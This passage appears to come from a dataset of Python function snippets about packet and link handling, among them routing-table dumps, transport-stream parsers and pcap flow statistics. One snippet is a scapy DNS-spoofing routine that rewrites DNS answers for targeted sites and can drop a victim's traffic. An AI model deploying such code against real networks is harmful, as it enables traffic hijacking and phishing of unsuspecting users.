{'login': 0}\n return srp_rcvd", "def readPacket(stream):\n header = readPacketHeader(stream)\n md5 = stream.read(16)\n data = stream.read(header.length)\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! (expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def dump(self, packet):\n #self.print_table()\n src = packet[\"dst\"]\n dst = packet[\"src\"]\n routes_dump = []\n for route in self.routes:\n for verat in route[\"varats\"]:\n routes_dump.append({\"network\": verat[\"network\"], \"netmask\": verat[\"netmask\"],\n \"peer\": route[\"peer\"]})\n \n a = {\"src\": src, \"dst\": dst, \"type\": \"table\", \"msg\": routes_dump}\n return a", "def parse_from_dref(self, packet):\n\t\tname = packet[9:].strip(b'\\x00').decode('utf-8')\n\t\traw_value = packet[5:9]\n\t\tvalue = struct.unpack('f', raw_value)[0]\n\t\treturn name, value", "def parse_data(self, data):\n\t\tname, value = self.parse_from_dref(data)\n\t\tpacket = TrollPacket.from_name(name, value)\n\t\tself.update_listeners(packet)", "def dump(self, packet):\n # packet is already decoded\n msg = {\n SRCE: packet[DEST], \n DEST: packet[SRCE], \n TYPE: TABL,\n MESG: list(map(lambda r: ({ \n NTWK: r[MESG][NTWK],\n NMSK: r[MESG][NMSK],\n PEER: r[SRCE],\n }),\n self.routes))\n }\n self.sockets[packet[SRCE]].send(json.dumps(msg).encode())\n return True", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n inPort = msg.match['in_port']\n\n packet = Packet(msg.data)\n etherFrame = packet.get_protocol(ethernet)\n\n if etherFrame.ethertype == ether.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n\n if etherFrame.ethertype == ether.ETH_TYPE_ARP:\n self.receive_arp(datapath, packet, etherFrame, inPort)\n elif etherFrame.ethertype == ether.ETH_TYPE_IP:\n self.receive_ip(datapath, packet, etherFrame, inPort)\n else:\n LOG.debug(\"receive Unknown packet %s => %s (port%d)\"\n % (etherFrame.src, etherFrame.dst, inPort))\n self.print_etherFrame(etherFrame)\n LOG.debug(\"Drop packet\")\n return 1\n return 0", "def get_payload(packet):\n #payload_len = get_payload_length(packet)\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n header_size = 4 + adaptation_field_len\n return packet[header_size:]", "def process_packet(packet):\n # convert packet to scapy packet\n scapy_packet = scapy.IP(packet.get_payload())\n\n # looking DNS response\n # DNSRR: DNS response, DNSRQ: DNS request\n if scapy_packet.haslayer(scapy.DNSRR):\n # qname: url\n qname = scapy_packet[scapy.DNSQR].qname\n for website in websites:\n if website in qname:\n print(\"[+] Spoofing target\")\n # redirect to the ip that is specified in rdata\n answer = scapy.DNSRR(rrname=qname, rdata=ip)\n # modify answer part in DNS layer\n scapy_packet[scapy.DNS].an = answer\n scapy_packet[scapy.DNS].ancount = 1\n\n # avoid corruption\n del scapy_packet[scapy.IP].len\n del scapy_packet[scapy.IP].chksum\n del scapy_packet[scapy.UDP].chksum\n del scapy_packet[scapy.UDP].len\n\n packet.set_payload(str(scapy_packet))\n\n break\n\n print(scapy_packet.show())\n\n # forward the packet to destination\n packet.accept()\n # cut the internet connection of the target client\n # i.e. not allowing the packet to reach destination\n # packet.drop()", "def gen_ieee_packet(self, data):\n\t\tpacket = Dot15d4FCS() / Dot15d4Data() / Raw(load=data)\n\n\t\tpacket.fcf_srcaddrmode = 2\n\t\tpacket.fcf_destaddrmode = 2\n\n\t\tpacket.fcf_panidcompress = True\n\t\tpacket.fcf_ackreq = True\n\t\tpacket.seqnum = self.seqnum\n\n\t\tpacket.dest_panid = self.link_config.dest_panid\n\n\t\tpacket.dest_addr = self.link_config.destination.get_short_address()\n\t\tpacket.src_addr = self.link_config.source.get_short_address()\n\n\t\treturn packet.build()", "def handle_pkt_header(pkt, packets, index):\r\n dest_mac = pkt[0:12]\r\n str_dest_mac = dest_mac[0:2]\r\n for i in range(2, len(dest_mac), 2):\r\n str_dest_mac += \":\" + dest_mac[i:i+2]\r\n packets[index][0].append(str_dest_mac)\r\n src_mac = pkt[12:24]\r\n str_src_mac = pkt[0:2]\r\n for i in range(2, len(src_mac), 2):\r\n str_src_mac += \":\" + src_mac[i:i+2]\r\n packets[index][0].append(str_src_mac)\r\n etherType = pkt[24:28]\r\n packets[index][0].append(etherType)\r\n\r\n return packets", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def pack_package(id, size, ipv6):\n if size < int(struct.calcsize(\"d\")):\n return\n if ipv6:\n header = struct.pack('BbHHh', PingPackage.ICMP_TYPE_IP6,\n PingPackage.ICMP_CODE, PingPackage.ICMP_CHECKSUM,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n else:\n header = struct.pack('bbHHh', PingPackage.ICMP_TYPE,\n PingPackage.ICMP_CODE, PingPackage.ICMP_CHECKSUM,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n load = \"-- ARP PING PACKAGE! --\"\n size -= struct.calcsize(\"d\")\n rest = \"\"\n if size > len(load):\n rest = load\n size -= len(load)\n\n rest += size * \"X\"\n data = struct.pack(\"d\", time.time()) + rest\n packet = header + data\n checksum = PingPackage._get_cksum(packet)\n if ipv6:\n header = struct.pack('BbHHh', PingPackage.ICMP_TYPE_IP6,\n PingPackage.ICMP_CODE, checksum,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n else:\n header = struct.pack('bbHHh', PingPackage.ICMP_TYPE,\n PingPackage.ICMP_CODE, checksum,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n packet = header + data\n return packet", "def __parse(self, packet: bytes) -> TSPacket.TSPacket:\n p = TSPacket.TSPacket()\n try:\n b1, b23, b4 = struct.unpack('>BHB', packet[0:4])\n # 4-byte Transport Stream Header\n p.tsh_sync = b1\n p.tsh_tei = (b23 & 32768) >> 15\n p.tsh_pusi = (b23 & 16384) >> 14\n p.tsh_tp = (b23 & 8192) >> 13\n p.tsh_pid = b23 & 8191\n p.tsh_tsc = (b4 & 192) >> 6\n p.tsh_afc = (b4 & 48) >> 4\n p.tsh_cc = b4 & 15\n # Adaptation Field\n if p.tsh_afc == 2 or p.tsh_afc == 3:\n p.af_length = packet[4] # b1\n if p.af_length != 0:\n b2 = packet[5]\n p.af_disc = (b2 & 128) >> 7\n p.af_random = (b2 & 64) >> 6\n p.af_espi = (b2 & 32) >> 5\n p.af_pcrf = (b2 & 16) >> 4\n p.af_opcrf = (b2 & 8) >> 3\n p.af_spf = (b2 & 4) >> 2\n p.af_tpdf = (b2 & 2) >> 1\n p.af_afef = b2 & 1\n pos = 6\n if p.af_pcrf:\n # p.af_pcr = packet[6:12]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_pcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_opcrf:\n # p.af_opcr = packet[pos:(pos+6)]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_opcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_spf:\n p.af_sc = packet[pos]\n pos += 1\n if p.af_tpdf:\n l = packet[pos]\n pos += 1\n p.af_tpd = packet[pos:(pos+l)]\n pos += l\n if p.af_afef:\n l = packet[pos]\n pos += 1\n p.af_ae = packet[pos:(pos+l)]\n # Calculate payload start byte\n if p.tsh_afc == 1:\n p.payload = 4\n elif p.tsh_afc == 3:\n p.payload = 5 + p.af_length\n return p\n except Exception as err:\n logging.warning('TS packet parsing error:' + str(err))\n return None", "def printMatchedPacket(pkt, rule):\n\n if (IP in pkt):\n # IP Header\n displayMatchedIP(pkt[IP], rule)\n elif (IPv6 in pkt):\n displayIPv6(pkt[IPv6])\n if (TCP in pkt):\n # TCP Header\n displayMatchedTCP(pkt[TCP], rule)\n # Payload\n displayMatchedTCPPayload(pkt[TCP], rule)\n\n elif (UDP in pkt):\n displayUDP(pkt[UDP])\n print \"[UDP Payload]\"\n displayPayload(pkt[UDP])", "def convert_cast(node, **kwargs):\n name, input_nodes, attrs = get_inputs(node, kwargs)\n\n dtype = attrs[\"dtype\"]\n\n # dtype can be mapped only with types from TensorProto\n # float32 is mapped to float and float64 to double in onnx\n # following tensorproto mapping https://github.com/onnx/onnx/blob/master/onnx/mapping.py\n if dtype == 'float32':\n dtype = 'float'\n elif dtype == 'float64':\n dtype = 'double'\n\n node = onnx.helper.make_node(\n \"Cast\",\n input_nodes,\n [name],\n to=getattr(onnx.TensorProto, dtype.upper()),\n name=name,\n )\n return [node]", "def print_packet(self, pkt):\n ip_layer = pkt.getlayer(IP)\n print(\"[!] New Packet: {src} -> {dst}\".format(src=ip_layer.src, dst=ip_layer.dst))", "def encode_packet(self, packet):\n\n\t\ttry:\n\t\t\toutput = self.pack('ubyte', packet.ident)\n\t\t\tappend = ''\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tfor i in ('x2','y2','z2'):\n\t\t\t\t\t\tappend += self.pack('short', packet.data[i])\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = []\n#\t\t\t\tbtypes = []\n#\t\t\t\tmetadata = []\n#\t\t\t\tfor i in packet.data['blocks']:\n#\t\t\t\t\tcoords.append(i['x'] << 12 | i['z'] << 8 | i['y'])\n#\t\t\t\t\tbtypes.append(i['type'])\n#\t\t\t\t\tmetadata.append(i['metadata'])\n#\t\t\t\t\n#\t\t\t\tpacket.data['data_size'] = len(coords)\n#\t\t\t\tappend += self.pack_array_fast('short', coords)\n#\t\t\t\tappend += self.pack_array_fast('byte', btypes)\n#\t\t\t\tappend += self.pack_array_fast('byte', metadata)\n\t\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\tarray = []\n\t\t\t\tfor i in packet.data['blocks']:\n\t\t\t\t\tarray += [i['x'], i['y'], i['z']]\n\t\t\t\tpacket.data['data_size'] = len(packet.data['blocks'])\n\t\t\t\tappend += self.pack_array_fast('byte', array)\n\t\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['slots_data'])\n\t\t\t\tappend += self.pack_array('slot', packet.data['slots_data'])\n\t\t\t#0x82: Sign\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"line_%s\" % (i+1)] = packet.data[\"text\"][i]\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\n\t\t\tfor i in self.get_struct(packet):\n\t\t\t\toutput += self.pack(i[0], packet.data[i[1]])\n\t\t\t\n\t\t\toutput += append\n\t\t\treturn output\n\t\texcept Exception:\n\t\t\traise", "def get_pkt(self):\n return self.pkt", "def _validate_type(self):\n if self._type != \"link\":\n raise securesystemslib.exceptions.FormatError(\n \"Invalid Link: field `_type` must be set to 'link', got: {}\"\n .format(self._type))", "def detach_typed_link(self, typed_link_specifier: Dict[str, Any]):\n return cd_client.detach_typed_link(\n DirectoryArn=self._dir_arn,\n TypedLinkSpecifier=typed_link_specifier\n )", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def link_converter(self):\n for index, radio_field in enumerate(self.radios):\n radio_field = wtp.parse(radio_field)\n have_wiki = True if radio_field.wikilinks else False\n if have_wiki:\n radio_name = radio_field.wikilinks[0].title\n else:\n radio_name = str(radio_field)\n\n #replace raw wikitext by a RadioCell element\n self.radios[index] = RadioCell(radio_name, have_wiki)", "def new_packet():\n return rtmp_packet.RtmpPacket()", "def convert_lsdb_to_graph_info(lsdb) :\n\n links = []\n\n # trace router lsa, link type 1 and 4\n for lsa_id, lsa in lsdb.rdb.items() :\n for rlink in lsa.attached_links :\n if rlink.link_type == P2P_LINK or rlink.link_type == VIRTUAL_LINK :\n links.append({\"source\": \"rtr:\" + lsa_id,\n \"target\": \"rtr:\" + rlink.link_id})\n\n # trace network lsa.\n for lsa_id, lsa in lsdb.ndb.items() :\n for attached in lsa.attached_routers :\n links.append({\"source\": \"net:\" + lsa_id,\n \"target\": \"rtr:\" + attached})\n\n # generate node info\n nodes = []\n for x in lsdb.rdb.keys() : nodes.append({\"id\" : \"rtr:\" + x,\n \"type\" : \"router\",\n \"name\": x})\n for x in lsdb.ndb.keys() : nodes.append({\"id\" : \"net:\" + x,\n \"type\" : \"network\",\n \"name\": x})\n\n return {\"nodes\": nodes, \"links\": links }", "def _decode_link(self, link):\n\n if link.HasField(\"bucket\"):\n bucket = link.bucket\n else:\n bucket = None\n if link.HasField(\"key\"):\n key = link.key\n else:\n key = None\n if link.HasField(\"tag\"):\n tag = link.tag\n else:\n tag = None\n\n return (bucket, key, tag)", "def decodepkt(self, pkt):\n res = \"\"\n if pkt.startswith('$'):\n try:\n self.logger.debug('unpack< %s', pkt) \n res = self.unpack(pkt)\n except ValueError as ex:\n self.logger.debug('GDB-< %s', res)\n self.logger.warning('Bad packet %s', ex) \n self.s.send(b'-')\n else:\n self.s.send(b'+')\n self.logger.debug('GDB+< %s', res) \n return res\n else:\n self.logger.warning('discards %s', pkt)", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def _parse_ip_stats_link_show(raw_result):\n\n show_re = (\n r'.+?RX:.*?\\n'\n r'\\s*(?P<rx_bytes>\\d+)\\s+(?P<rx_packets>\\d+)\\s+(?P<rx_errors>\\d+)\\s+'\n r'(?P<rx_dropped>\\d+)\\s+(?P<rx_overrun>\\d+)\\s+(?P<rx_mcast>\\d+)'\n r'.+?TX:.*?\\n'\n r'\\s*(?P<tx_bytes>\\d+)\\s+(?P<tx_packets>\\d+)\\s+(?P<tx_errors>\\d+)\\s+'\n r'(?P<tx_dropped>\\d+)\\s+(?P<tx_carrier>\\d+)\\s+(?P<tx_collisions>\\d+)'\n )\n\n re_result = match(show_re, raw_result, DOTALL)\n result = None\n\n if (re_result):\n result = re_result.groupdict()\n for key, value in result.items():\n if value is not None:\n if value.isdigit():\n result[key] = int(value)\n\n return result", "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def packet(self):\n return self.server.packet(context=self.ctx)", "def add_link_type_vlan(enode, portlbl, name, vlan_id, shell=None):\n assert name\n if name in enode.ports:\n raise ValueError('Port {name} already exists'.format(name=name))\n\n assert portlbl\n assert vlan_id\n port = enode.ports[portlbl]\n\n cmd = 'ip link add link {dev} name {name} type vlan id {vlan_id}'.format(\n dev=port, name=name, vlan_id=vlan_id)\n\n response = enode(cmd, shell=shell)\n assert not response, 'Cannot add virtual link {name}'.format(name=name)\n\n enode.ports[name] = name", "def setupPacket(self):\n return None", "def read(data):\n return Link(**data)", "def dumppkt(self):\n try:\n return ( (k, getattr(self,k)) for k in self.__pkt_fields__ + self.__dyn_fields__ )\n except AttributeError:\n raise KeyError", "def _handlePacketFromRadio(self, meshPacket):\n\n asDict = google.protobuf.json_format.MessageToDict(meshPacket)\n # /add fromId and toId fields based on the node ID\n asDict[\"fromId\"] = self._nodeNumToId(asDict[\"from\"])\n asDict[\"toId\"] = self._nodeNumToId(asDict[\"to\"])\n\n # We could provide our objects as DotMaps - which work with . notation or as dictionaries\n # asObj = DotMap(asDict)\n topic = \"meshtastic.receive\" # Generic unknown packet type\n\n # Warn users if firmware doesn't use new portnum based data encodings\n # But do not crash, because the lib will still basically work and ignore those packet types\n if meshPacket.decoded.HasField(\"user\") or meshPacket.decoded.HasField(\"position\"):\n logging.warn(\"Ignoring old position/user message. Recommend you update firmware to 1.1.20 or later\")\n\n if meshPacket.decoded.HasField(\"data\"):\n\n # The default MessageToDict converts byte arrays into base64 strings.\n # We don't want that - it messes up data payload. So slam in the correct\n # byte array.\n asDict[\"decoded\"][\"data\"][\"payload\"] = meshPacket.decoded.data.payload\n\n # UNKNOWN_APP is the default protobuf portnum value, and therefore if not set it will not be populated at all\n # to make API usage easier, set it to prevent confusion\n if not \"portnum\" in asDict[\"decoded\"][\"data\"]:\n asDict[\"decoded\"][\"data\"][\"portnum\"] = portnums_pb2.PortNum.Name(portnums_pb2.PortNum.UNKNOWN_APP)\n\n portnum = asDict[\"decoded\"][\"data\"][\"portnum\"]\n\n topic = f\"meshtastic.receive.data.{portnum}\"\n\n # For text messages, we go ahead and decode the text to ascii for our users\n if portnum == portnums_pb2.PortNum.Name(portnums_pb2.PortNum.TEXT_MESSAGE_APP):\n topic = \"meshtastic.receive.text\"\n\n # We don't throw if the utf8 is invalid in the text message. Instead we just don't populate\n # the decoded.data.text and we log an error message. This at least allows some delivery to\n # the app and the app can deal with the missing decoded representation.\n #\n # Usually btw this problem is caused by apps sending binary data but setting the payload type to\n # text.\n try:\n asDict[\"decoded\"][\"data\"][\"text\"] = meshPacket.decoded.data.payload.decode(\"utf-8\")\n except Exception as ex:\n logging.error(f\"Malformatted utf8 in text message: {ex}\")\n\n # decode position protobufs and update nodedb, provide decoded version as \"position\" in the published msg\n if portnum == portnums_pb2.PortNum.Name(portnums_pb2.PortNum.POSITION_APP):\n topic = \"meshtastic.receive.position\"\n pb = mesh_pb2.Position()\n pb.ParseFromString(meshPacket.decoded.data.payload)\n p = google.protobuf.json_format.MessageToDict(pb)\n self._fixupPosition(p)\n asDict[\"decoded\"][\"data\"][\"position\"] = p\n # update node DB as needed\n self._getOrCreateByNum(asDict[\"from\"])[\"position\"] = p\n\n # decode user protobufs and update nodedb, provide decoded version as \"position\" in the published msg\n if portnum == portnums_pb2.PortNum.Name(portnums_pb2.PortNum.NODEINFO_APP):\n topic = \"meshtastic.receive.user\"\n pb = mesh_pb2.User()\n pb.ParseFromString(meshPacket.decoded.data.payload)\n u = google.protobuf.json_format.MessageToDict(pb)\n asDict[\"decoded\"][\"data\"][\"user\"] = u\n # update node DB as needed\n n = self._getOrCreateByNum(asDict[\"from\"])\n n[\"user\"] = u\n # We now have a node ID, make sure it is uptodate in that table\n self.nodes[u[\"id\"]] = n\n\n logging.debug(f\"Publishing topic {topic}\")\n pub.sendMessage(topic, packet=asDict, interface=self)", "def decode_ad_report(ad_packet):\n # Initialize return object\n ret = { 'type': None, 'adinfo_bytes': len(ad_packet) }\n # Check that we have the minimum ad info header length\n if len(ad_packet) >= 9:\n # Decode advertising report header\n AdInfoHeader = namedtuple('AdInfoHeader', 'event bdaddr_type '\n + 'bdaddr length')\n aih = AdInfoHeader._make(struct.unpack('<BB6sB', ad_packet[:9]))\n # Check if this is valid advertisement info\n if aih.event == 0x03 and aih.bdaddr_type == 0x00 and \\\n aih.length + 10 <= len(ad_packet):\n # This is valid, update the adinfo length\n ret['adinfo_bytes'] = aih.length + 10\n # Add Bluetooth device address to return object\n ret['bdaddr'] = ':'.join(reversed(['%02X' % ord(b)\n for b in aih.bdaddr]))\n # Move to first ad struct\n ad_struct = ad_packet[9:]\n # Create default beacon_data\n beacon_data = {}\n # Iterate over ad structs\n while len(ad_struct) > 1:\n # Try different beacon decoders\n for decoder in decode_ad_struct_list:\n # Run a decoder\n beacon_data = decoder(ad_struct)\n #print beacon_data\n # Stop if this decoder recognized the data\n if beacon_data['type']:\n break\n # Stop if we decoded the beacon data\n if beacon_data['type']:\n break\n # Go to the next ad struct\n ad_struct = ad_struct[beacon_data['adstruct_bytes']:]\n # Add beacon data to return object\n for key, val in beacon_data.iteritems():\n if key != 'adstruct_bytes':\n ret[key] = val\n # Add observed RSSI to return object\n ret['rssi_obs'], = struct.unpack('<b', ad_packet[aih.length + 9])\n # Return the return object\n return ret", "def handle_packet(self, packet, udp_dport):\n return self.process_packet(packet, udp_dport)", "def send_packet(self, raw_packet):\n\n if self.verbose:\n print(\"< %s\" % \" \".join(\"%02x\" % i for i in raw_packet))\n\n # Send the data to the device.\n self.ftdi.write(self.ftdi.INTERFACE_A, raw_packet, async_=False)", "def decode_raw(data):\n return RawWire().decode(data)", "def extract_trpt_data(udp_packet):\n logger.debug('UDP packet sport [%s], dport [%s], len [%s]',\n udp_packet.sport, udp_packet.dport, udp_packet.len)\n\n trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)\n trpt_eth = EthInt(trpt_pkt.payload)\n logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',\n trpt_eth.dst, trpt_eth.src, trpt_eth.type)\n return extract_int_data(trpt_eth)", "def decode_network_packet(buf):\n off = 0\n blen = len(buf)\n\n while off < blen:\n ptype, plen = header.unpack_from(buf, off)\n\n if plen > blen - off:\n raise ValueError(\"Packet longer than amount of data in buffer\")\n\n if ptype not in _decoders:\n raise ValueError(\"Message type %i not recognized\" % ptype)\n\n yield ptype, _decoders[ptype](ptype, plen, buf[off:])\n off += plen", "def dump(self, packet):\n # TODO\n packet['type'] = \"table\"\n src = packet['src']\n packet['src'] = packet['dst']\n packet['dst'] = src\n\n table_list = []\n\n # TODO fill out table string with routing table\n table_string = \"\"\n # TODO asking for int indexes instead of string for route?\n for ip in self.updates.keys():\n # TODO have to fill ip address of peer\n\n entry = {'network' : self.updates[ip][MESG][NTWK], 'netmask' : self.updates[ip][MESG][NMSK], 'peer' : ip}\n table_list.append(entry)\n packet[MESG] = table_list\n msg = json.dumps(packet)\n #print(json.dumps(packet, sort_keys=True, indent=4))\n\n sock = self.sockets[src]\n sock.sendall(msg.encode())\n return True", "def setPacket(self, packet):\n\t\tself.clear()\n\t\tself.packet = packet\n\t\t\n\t\tfields = self.fields\n\t\t\n\t\tfields.append(['Reception time', '%s:%s:%s.%s' % tuple(packet.time), None])\n\t\t\n\t\tif self.packet.isInvalid:\n\t\t\treturn\n\t\t\n\t\tfields.append(['Transmission info', 'CRC passed: %s, LQI: %s, RSSI: %s' % (packet.CRCOk, packet.LQI, packet.RSSI), None])\n\t\tfields.append(['PHY fields', '', None])\n\t\tphy = len(fields) - 1\n\t\tfields.append(['Frame length', len(packet.load), phy])\n\t\t\n\t\tfields.append(['MAC fields', '', None])\n\t\tmac = len(fields) - 1\n\t\tfields.append(['Frame control', packet.frameControl, mac])\n\t\tfields.append(['Frame Type', packet.frameType, mac])\n\t\tfields.append(['Security enabled', packet.securityEnabled, mac])\n\t\tfields.append(['Frame pending', packet.framePending, mac])\n\t\tfields.append(['Ack. request', packet.ackRequest, mac])\n\t\tfields.append(['Intra-PAN', packet.intraPAN, mac])\n\t\tfields.append(['Dest. addressing mode', packet.dstAddrMode, mac])\n\t\tfields.append(['Source addressing mode', packet.srcAddrMode, mac])\n\t\tfields.append(['Sequence number', packet.seqNumber, mac])\n\t\t\n\t\tif hasattr(packet, 'dstPANID'):\n\t\t\tfields.append(['Destination PAN-ID', packet.dstPANID, mac])\n\t\t\n\t\tif hasattr(packet, 'dstAddr'):\n\t\t\tfields.append(['Destination address', packet.dstAddr, mac])\n\t\t\n\t\tif hasattr(packet, 'srcPANID'):\n\t\t\tfields.append(['Source PAN-ID', packet.srcPANID, mac])\n\t\t\t\n\t\tif hasattr(packet, 'srcAddr'):\n\t\t\tfields.append(['Source address', packet.srcAddr, mac])\n\t\t\t\n\t\tif hasattr(packet, 'payload'):\n\t\t\tfields.append(['Payload', packet.payload, mac])\n\t\t\n\t\tif hasattr(packet, 'commandType'):\n\t\t\tfields.append(['Command type', packet.commandType, mac])\n\t\t\n\t\tif hasattr(packet, 'commandPayload'):\n\t\t\tfields.append(['Command payload', packet.commandPayload, mac])\n\t\t\n\t\tif hasattr(packet, 'superFrameSpec'):\n\t\t\tfields.append(['Superframe specification', packet.superFrameSpec, mac])\n\t\t\tsfs = len(fields) - 1\n\t\t\tfields.append(['Beacon order', packet.beaconOrder, sfs])\n\t\t\tfields.append(['Superframe order', packet.superFrameOrder, sfs])\n\t\t\tfields.append(['finalCAPSlot', packet.finalCAPSlot, 